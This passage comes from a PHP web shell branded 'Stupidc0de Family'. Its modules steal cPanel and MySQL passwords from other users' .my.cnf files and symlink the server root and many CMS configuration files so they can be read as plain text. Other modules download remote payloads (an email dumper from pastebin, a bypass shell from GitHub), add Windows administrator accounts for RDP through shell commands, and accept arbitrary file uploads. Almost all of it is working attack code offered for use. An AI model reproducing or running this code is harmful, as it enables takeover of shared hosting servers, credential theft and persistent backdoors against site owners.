1183.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=mpc"><input class=bordergaya type=submit value="Wordpress Mass Password Changer" /></a>
1184.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=zonesH"><input class=bordergaya type=submit value="Zone-H Mass Notifier" /></a>
1185.                
1186.                     <?php
1187.                     break;
1188.         }  
1189.         elseif(isset($_GET['x']) && ($_GET['x'] == 'tentang'))
1190.         {
1191.                 echo"<br><br>
1192.                     <center><b>
1193.             <font face='Jolly Lodger' color='white' size='6px'> [+] Stupidc<font color='teal'>0</font>de Family [+]</font><br>
1194.                     <br>
1195.             <font face='Fredericka The Great' color='white' size='3px'>&hearts; Respect Us, Little Crazy Family From Indonesia ^_^  &hearts;<br><br>
1196.             -:- No Leader We Just Laugh Together -:-</font><br><br>
1197.             <font color='gray'> http://www.stupidc0de.family/ </font><br><br><br>
1198.             </center>
1199.                     </b>";
1200.                     break;
1201.         }
1202.  
1203.  
1204.             elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel'))
1205.                 {
1206.                     echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
1207.                 ?>
1208.                        
1209.                     <a href="?<?php echo "path=".$path; ?>&amp;x=brute"><input class=bordergaya type=submit value="Cpanel Bruteforce" /></a>
1210.                     Or <a href="?<?php echo "path=".$path; ?>&amp;x=cpcrack"><input class=bordergaya type=submit value="Auto Cpanel Finder/Cracker" /></a>
1211.                     <br/><br/><br/><br/>
1212.                 <?php break; ?>
1213.  
1214.                 <?php
1215.                 }
1216.             elseif(isset($_GET['x']) && ($_GET['x'] == 'cpcrack'))
1217.                 {
1218.                 ?>
1219.                             <form action="?path=<?php echo $path; ?>&amp;x=cpcrack" method="post">
1220.                 <?php
1221.              
1222.             @ini_set('display_errors',0);
1223.             function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1224.                 $ar0=explode($marqueurDebutLien, $text);
1225.                 $ar1=explode($marqueurFinLien, $ar0[$i]);
1226.                 return trim($ar1[0]);
1227.             }
1228.  
1229.             echo '<h1>Cpanel Finder/Cracker</h1><br/>';
1230.              
1231.             echo "<center>";
1232.             $d0mains = @file('/etc/named.conf');
1233.             $domains = scandir("/var/named");
1234.              
1235.             if ($domains or $d0mains)
1236.             {
1237.                 $domains = scandir("/var/named");
1238.                 if($domains) {
1239.             echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1240.             $count=1;
1241.             $dc = 0;
1242.             $list = scandir("/var/named");
1243.             foreach($list as $domain){
1244.             if(strpos($domain,".db")){
1245.             $domain = str_replace('.db','',$domain);
1246.             $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1247.             $dirz = '/home/'.$owner['name'].'/.my.cnf';
1248.             $path = getcwd();
1249.              
1250.             if (is_readable($dirz)) {
1251.             copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
1252.             $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
1253.             $password=entre2v2($p,'password="','"');
1254.             echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
1255.             $dc++;
1256.             }
1257.              
1258.             }
1259.             }
1260.             echo '</table>';
1261.             $total = $dc;
1262.             echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
1263.             echo '</center>';
1264.             }else{
1265.             $d0mains = @file('/etc/named.conf');
1266.                 if($d0mains) {
1267.             echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1268.             $count=1;
1269.             $dc = 0;
1270.             $mck = array();
1271.             foreach($d0mains as $d0main){
1272.                 if(@eregi('zone',$d0main)){
1273.                     preg_match_all('#zone "(.*)"#',$d0main,$domain);
1274.                     flush();
1275.                     if(strlen(trim($domain[1][0])) >2){
1276.                         $mck[] = $domain[1][0];
1277.                     }
1278.                 }
1279.             }
1280.             $mck = array_unique($mck);
1281.             $usr = array();
1282.             $dmn = array();
1283.             foreach($mck as $o) {
1284.                 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1285.                 $usr[] = $infos['name'];
1286.                 $dmn[] = $o;
1287.             }
1288.             array_multisort($usr,$dmn);
1289.             $dt = file('/etc/passwd');
1290.             $passwd = array();
1291.             foreach($dt as $d) {
1292.                 $r = explode(':',$d);
1293.                 if(strpos($r[5],'home')) {
1294.                     $passwd[$r[0]] = $r[5];
1295.                 }
1296.             }
1297.             $l=0;
1298.             $j=1;
1299.             foreach($usr as $r) {
1300.             $dirz = '/home/'.$r.'/.my.cnf';
1301.             $path = getcwd();
1302.             if (is_readable($dirz)) {
1303.             copy($dirz, ''.$path.'/'.$r.'.txt');
1304.             $p=file_get_contents(''.$path.'/'.$r.'.txt');
1305.             $password=entre2v2($p,'password="','"');
1306.             echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1307.             $dc++;
1308.                             flush();
1309.                             $l=$l?0:1;
1310.                             $j++;
1311.                                             }
1312.                         }
1313.                                     }
1314.             echo '</table>';
1315.             $total = $dc;
1316.             echo '<br><h3>Total cPanel Found = '.$total.'</h3><br />';
1317.             echo '</center>';
1318.              
1319.             }
1320.             }else{
1321.             echo "<h3><i><font color='red'>ERROR</font><br><font color='red'>/var/named</font> or <font color='red'>etc/named.conf</font> Not Accessible!</i></h3>";
1322.             }
1323.  
1324.             echo "</body></html>";
1325.             break;
1326.         }
1327.  
1328.             ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1329.             ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////END OF CPANEL TOOLS//////////////////////////////
1330.             ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1331.  
1332.  
1333.         elseif(isset($_GET['x']) && ($_GET['x'] == 'vn'))
1334.                     {
1335.                     ?>
1336.                     <form action="?path=<?php echo $path; ?>&amp;x=vn" method="post">
1337.                     <center><h2>Domain Viewer</h2></center><br><br>
1338.                     <?php
1339.                     function openBaseDir()
1340.                 {
1341.                 $openBaseDir = ini_get("open_basedir");
1342.                 if (!$openBaseDir)
1343.                     {
1344.                         $openBaseDir = '<font color="green">OFF</font>';
1345.                     }
1346.                     else
1347.                     {
1348.                         $openBaseDir = '<font color="red">ON</font>';
1349.                     }    
1350.                     return $openBaseDir;
1351.                 }
1352.  
1353.  
1354.                 echo '
1355.                     <table width="95%" cellspacing="0" cellpadding="0"  >
1356.                     <td height="100" align="left" >';
1357.                     $pg = basename(__FILE__);
1358.                     $safe_mode = @ini_get('safe_mode');
1359.                     $dir = @getcwd();
1360.                     ////////////////////////////////////////////////////
1361.                     #.htaccess
1362.                 @mkdir('pee',0777);
1363.                 @symlink("/","pee/root");
1364.                 $htaccss = "Options all
1365.                  DirectoryIndex Sux.html
1366.                  AddType text/plain .php
1367.                  AddHandler server-parsed .php
1368.                   AddType text/plain .html
1369.                  AddHandler txt .html
1370.                  Require None
1371.                  Satisfy Any";
1372.                  
1373.                 file_put_contents("pee/.htaccess",$htaccss);
1374.                 $etc = file_get_contents("/etc/passwd");
1375.                 $etcz = explode("\n",$etc);
1376.  
1377.  
1378.                 ##Symlink to the ROOT :p
1379.                 foreach($etcz as $etz){
1380.                 $etcc = explode(":",$etz);
1381.                 error_reporting(0);
1382.  
1383.                 $current_dir = posix_getcwd();
1384.                 $dir = explode("/",$current_dir);
1385.  
1386.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1387.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1388.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1389.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1390.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
1391.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
1392.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1393.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1394.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1395.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1396.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
1397.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
1398.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
1399.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
1400.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
1401.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
1402.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
1403.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1404.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1405.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1406.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1407.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1408.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1409.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1410.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1411.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1412.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1413.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1414.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1415.                 symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1416.                 }
1417.                 #############################
1418.                     if(is_readable("/var/named")){
1419.                     echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1420.                     echo'<tr><td><center><b>SITE</b></center></td><td>
1421.                     <center><b>USER</b></center></td>
1422.                     <td></center><b>SYMLINK</b></center></td>';
1423.                     $list = scandir("/var/named");
1424.                     foreach($list as $domain){
1425.                     if(strpos($domain,".db")){
1426.                     $i += 1;
1427.                     $domain = str_replace('.db','',$domain);
1428.                     $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1429.  
1430.                     echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1431.                     <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
1432.                     <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1433.                         }
1434.                     }
1435.                     echo "<center>Total Domains Found: ".$i."</center><br />";
1436.                     }else{
1437.                     echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
1438.  
1439.                 break;
1440.  
1441.                 ##################################
1442.                 error_reporting(0);
1443.                 $etc = file_get_contents("/etc/passwd");
1444.                 $etcz = explode("\n",$etc);
1445.                 if(is_readable("/etc/passwd")){
1446.  
1447.                 echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1448.                 echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
1449.  
1450.                 $list = scandir("/var/named");
1451.  
1452.                 foreach($etcz as $etz){
1453.                 $etcc = explode(":",$etz);
1454.  
1455.                 foreach($list as $domain){
1456.                 if(strpos($domain,".db")){
1457.                 $domain = str_replace('.db','',$domain);
1458.                 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1459.                 if($owner['name'] == $etcc[0])
1460.                 {
1461.                 $i += 1;
1462.                 echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
1463.                 <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1464.                 <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1465.                 }}}}
1466.                 echo "<center>Total Domains Found: ".$i."</center><br />";}
1467.  
1468.                 break;
1469.                 ###############################
1470.                 if(is_readable("/etc/named.conf")){
1471.                 echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1472.                 echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
1473.                 $named = file_get_contents("/etc/named.conf");
1474.                 preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1475.                 foreach($domains[1] as $domain){
1476.                 $domain = trim($domain);
1477.                 $i += 1;
1478.                 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1479.                 echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1480.                 }
1481.                 echo "<center>Total Domains Found: ".$i."</center><br />";
1482.  
1483.                 } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
1484.  
1485.                 break;
1486.                 ############################
1487.                 if(is_readable("/etc/valiases")){
1488.                 echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1489.                 echo'<tr><td><center><b>SITE</b></center></td><td>
1490.                 <center><b>USER</b></center></td><td></center>
1491.                 <b>SYMLINK</b></center></td>';
1492.                 $list = scandir("/etc/valiases");
1493.                 foreach($list as $domain){
1494.                 $i += 1;
1495.                 $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1496.                 echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1497.                 <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1498.                 <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1499.                 }
1500.                 echo "<center>Total Domains Found: ".$i."</center><br />";
1501.                 } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
1502.  
1503.                 break;
1504.         }
1505.  
1506.         ///DUMP
1507.         elseif(isset($_GET['x']) && ($_GET['x'] == 'dump'))
1508.                 {
1509.                 ?>
1510.                 <br/><br/>
1511.                 <form action="?path=<?php echo $path; ?>&amp;x=dump" method="post">
1512.                 <?php
1513.                 $pilih = $_POST['pilihan'];
1514.                 echo'<center>
1515.                 <table border=1>
1516.                 <select class="bordergaya" align="left"  name="pilihan" id="pilih">
1517.                 <option value="dumper">Gate 1</option>
1518.                 </select>
1519.                 <input  type="submit" name="submites" class="bordergaya" value="Click here for Dump Email">';?><?php
1520.                 if ( $pilih == "dumper") {
1521.                     $files = file_get_contents("http://pastebin.com/raw/HhiURUER");
1522.                         file_put_contents("dumper.php",$files);
1523.                         echo "<script>alert('Done! Access dumper.php for processing'); hideAll();</script>";
1524.                         echo "<a href=".'dumper.php'." target=_blank><br/><br/><b>dumper.php [Click here]</b></a></center>";
1525.                         die();
1526.                         }
1527.                 echo'</td></form></tr></table>';
1528.                 break;
1529.         }
1530.  
1531.         ///menu rdp
1532.         if(isset($_GET['x']) && ($_GET['x'] == 'krdp'))
1533.             /* By Shor7cut */
1534.             /* Interface By Putra-Attacker*/
1535.         {
1536.                 if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
1537.                 {
1538.                         ?><br/><br/>
1539.                         <div id="content-left">
1540.                                 <form action="" method="post">
1541.                                 <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
1542.                                     <tr>
1543.                                         <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
1544.                                     </tr>
1545.                                     <tr>
1546.                                         <td><font class='kecew'>Username</font></td>
1547.                                         <td><font class='kecew'> : </font></td>
1548.                                         <td><input type="text" class="bordergaya" name="username" required></td>
1549.                                     </tr>
1550.                                     <tr>
1551.                                         <td><font class='kecew'>Password</font></td>
1552.                                         <td><font class='kecew'> : </font></td>
1553.                                         <td><input type="text" class="bordergaya" name="password" required></td>
1554.                                     </tr>
1555.                                     <tr>
1556.                                         <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
1557.                                     </tr>
1558.                                 </table>
1559.                                 </form>
1560.                                 </div>
1561.                                 <br/>
1562.                                 <div id="content-left">
1563.                                 <form action="" method="post">
1564.                                     <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
1565.                                         <tr>
1566.                                             <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
1567.                                         </tr>
1568.                                         <tr>
1569.                                             <td><font class='kecew'>Username</font></td>
1570.                                             <td><font class='kecew'> : </font></td>
1571.                                             <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
1572.                                         </tr>
1573.                                         <tr>
1574.                                             <td><font class='kecew'>Password</font></td>
1575.                                             <td><font class='kecew'> : </font></td>
1576.                                             <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
1577.                                         </tr>
1578.                                         <tr>
1579.                                             <td><font class='kecew'>Action</font></td>
1580.                                             <td><font class='kecew'> : </font></td>
1581.                                             <td>
1582.                                                 <select name="aksi" class="bordergaya">
1583.                                                         <option value="1">Tampilkan Username</option>
1584.                                                         <option value="2">Hapus Username</option>
1585.                                                         <option value="3">Ubah Password</option>
1586.                                                 </select>
1587.                                             </td>
1588.                                         </tr>
1589.                                         <tr>
1590.                                             <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
1591.                                         </tr>
1592.                                     </table>
1593.                                 </form>
1594.                                 <br/>
1595.                         </div>
1596.                         </center></center>
1597.                     <?php
1598.                     if($_POST['submit'])
1599.                     {
1600.                         if($_POST['kshell']=="1")
1601.                         {
1602.                             $r_user = $_POST['username'];
1603.                             $r_pass = $_POST['password'];
1604.                             $cmd_cek_user   = shell_exec("net user");
1605.                             if(preg_match("/$r_user/", $cmd_cek_user)){
1606.                                 echo $gaya_root.$r_user." sudah ada".$o;
1607.                             }else {
1608.                             $cmd_add_user   = shell_exec("net user ".$r_user." ".$r_pass." /add");
1609.                             $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
1610.                             $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
1611.                             $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
1612.                                 if($cmd_add_user){
1613.                                     echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o;
1614.                                 }else {
1615.                                     echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Gagal!</font><br/><br/>".$o;
1616.                                 }
1617.                                 echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar..  <br/>";
1618.                                 if($cmd_add_groups1){
1619.                                       echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1620.                                 }else
1621.                                 if($cmd_add_groups2){
1622.                                       echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1623.                                 }else
1624.                                 if($cmd_add_groups3){
1625.                                       echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1626.                                 }else {
1627.                                       echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Gagal Di Proses!</font><br/><br/>".$o;
1628.                                 }
1629.                                 echo "<font class='rapihbanget'>[+] Server Info : </font><br/>";
1630.                                 echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username  : ".$r_user."</font><br/><font class='rapihbanget'>--- Password  : </font>".$r_pass.$o."</font><br/><br/>";
1631.                                 echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>";
1632.                             }
1633.  
1634.  
1635.                         }
1636.                         else if($_POST['kshell']=="2")
1637.                         {
1638.                             echo "<style>
1639.                                     .coeg{margin-left:30%;}
1640.                                     </style>";
1641.                             if($_POST['aksi']=="1"){
1642.                              echo "<pre class='coeg'>".shell_exec("net user");
1643.                             }
1644.                             else if($_POST['aksi']=="2")
1645.                             {
1646.                                 $username = $_POST['rusername'];
1647.                                 $cmd_cek_user   = shell_exec("net user");
1648.                                     if (!empty($username)){
1649.                                         if(preg_match("/$username/", $cmd_cek_user)){
1650.                                         $cmd_add_user   = shell_exec("net user ".$username." /DELETE");
1651.                                         if($cmd_add_user){
1652.                                             echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu..  </font><br /><br />";
1653.                                             echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User  </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
1654.                                         }else {
1655.                                             echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User  </font><font color='orange'>".$username." </font><font color='red'>Gagal!!</font><br /><br />".$o;
1656.                                         }
1657.                                     }else {
1658.                                         echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
1659.                                     }
1660.                                     }else {
1661.                                         echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
1662.                                     }
1663.                             }
1664.                             else if($_POST['aksi']=="3")
1665.                             {
1666.                                 echo "<style>
1667.                                         .tengahaja{margin-left:35%}
1668.                                       </style>";
1669.                                 $username = $_POST['rusername'];
1670.                                 $password = $_POST['gantipw'];
1671.                                 $cmd_cek_user   = shell_exec("net user");
1672.                                     if (!empty($username)){
1673.                                         if(preg_match("/$username/", $cmd_cek_user)){
1674.                                             $cmd_add_user   = shell_exec("net user ".$username."");
1675.                                             if($cmd_add_user){
1676.                                             echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
1677.                                         }else {
1678.                                             echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Gagal!!</font><br /><br />".$o;
1679.                                         }
1680.                                     }else
1681.                                 {
1682.                                     echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
1683.                                 }
1684.                                 }else
1685.                                 {
1686.                                     echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
1687.                                 }      
1688.                             }
1689.                         }
1690.  
1691.                     }
1692.                 } else{
1693.                     echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>";
1694.                 }break;
1695.         }
1696.  
1697.         /*
1698.         AUTO UPLOAD
1699.         START HERE
1700.         */
1701.  
1702.         elseif(isset($_GET['x']) && ($_GET['x'] == 'fcrot'))
1703.             {
1704.                 echo'<center><br><br><h3>File Creator [Auto upload]</h3>
1705.                 <table>
1706.                 <tr><form method="post" action="">&nbsp;<td>
1707.                 <select class="bordergaya" align="left"  name="pilihan" id="pilih">
1708.                 <option value="hsphere">Bypass hSphere Shell</option>
1709.                 <option value="adminer">Adminer</option>
1710.                 </select>
1711.                 <input  type="submit" name="submites" class="bordergaya" value="create">
1712.                 </td></form></tr></table>';
1713.                 error_reporting(0);
1714.                 set_time_limit(0);
1715.                 $submit = $_POST ['submites'];
1716.                 if(isset($submit)) {
1717.                     $pilih = $_POST['pilihan'];
1718.                     ///hsphere shell
1719.                             if ( $pilih == 'hsphere') {
1720.                     $files = file_get_contents("https://raw.githubusercontent.com/sinkaroid/pasirmerah/sc0/sc0hsphere.php");
1721.                         file_put_contents("hsphere.php",$files);
1722.                         echo "<script>alert('Bypass hsphere shell created!'); hideAll();</script>";
1723.                         echo "<a href="."hsphere.php"." target=_blank><b>hsphere.php [Click here]</b></a></center>";
1724.                         die();
1725.                         }
1726.  
1727.                             elseif ( $pilih == 'adminer') {
1728.                         getfile("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php");
1729.                         echo "<script>alert('adminer created!'); hideAll();</script>";
1730.                         echo "<a href="."adminer.php"." target=_blank><b>adminer.php [Click here]</b></a></center>";
1731.                         die();
1732.                         }
1733.                        
1734.                     }break;
1735.             }
1736.  
1737.  
1738.         elseif(isset($_GET['x']) && ($_GET['x'] == 'korong'))
1739.             {
1740.                 echo '<center><br /><br />
1741.                         <form enctype="multipart/form-data" method="POST">
1742.                             <input type="file" name="file" id="file" class="inputfile inputfile-4" />
1743.                             <label for="file">
1744.                                 <figure>
1745.                                     <svg xmlns="http://www.w3.org/2000/svg" width="20" height="17" viewBox="0 0 20 17"><path d="M10 0l-5.2 4.9h3.3v5.1h3.8v-5.1h3.3l-5.2-4.9zm9.3 11.5l-3.2-2.1h-2l3.4 2.6h-3.5c-.1 0-.2.1-.2.1l-.8 2.3h-6l-.8-2.2c-.1-.1-.1-.2-.2-.2h-3.6l3.4-2.6h-2l-3.2 2.1c-.4.3-.7 1-.6 1.5l.6 3.1c.1.5.7.9 1.2.9h16.3c.6 0 1.1-.4 1.3-.9l.6-3.1c.1-.5-.2-1.2-.7-1.5z"/></svg>
1746.                                 </figure>
1747.                                 <span>Silahkan Pilih File</span>
1748.                             </label>';
1749.                             ?>
1750.                             <script type="text/javascript">
1751.                                     /*
1752.                                         By Osvaldas Valutis, www.osvaldas.info
1753.                                         Available for use under the MIT License
1754.                                     */
1755.  
1756.                                     'use strict';
1757.  
1758.                                     ;( function ( document, window, index )
1759.                                     {
1760.                                         var inputs = document.querySelectorAll( '.inputfile' );
1761.                                         Array.prototype.forEach.call( inputs, function( input )
1762.                                         {
1763.                                             var label    = input.nextElementSibling,
1764.                                                 labelVal = label.innerHTML;
1765.  
1766.                                             input.addEventListener( 'change', function( e )
1767.                                             {
1768.                                                 var fileName = '';
1769.                                                 if( this.files && this.files.length > 1 )
1770.                                                     fileName = ( this.getAttribute( 'data-multiple-caption' ) || '' ).replace( '{count}', this.files.length );
1771.                                                 else
1772.                                                     fileName = e.target.value.split( '\\' ).pop();
1773.  
1774.                                                 if( fileName )
1775.                                                     label.querySelector( 'span' ).innerHTML = fileName;
1776.                                                 else
1777.                                                     label.innerHTML = labelVal;
1778.                                             });
1779.  
1780.                                             // Firefox bug fix
1781.                                             input.addEventListener( 'focus', function(){ input.classList.add( 'has-focus' ); });
1782.                                             input.addEventListener( 'blur', function(){ input.classList.remove( 'has-focus' ); });
1783.                                         });
1784.                                     }( document, window, 0 ));
1785.                             </script>
1786.                             <?php
1787.                             echo'<br/>
1788.                             <input type="submit" class="tombolupil" value="Upload File!" />
1789.                         </form>';
1790.                         if(isset($_FILES['file'])){
1791.                         if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
1792.                         echo '<script>alert("File Sukses Di Upload!");</script>';
1793.                         }else{
1794.                         echo '<script>alert("File Gagal Di Upload!");</script>';
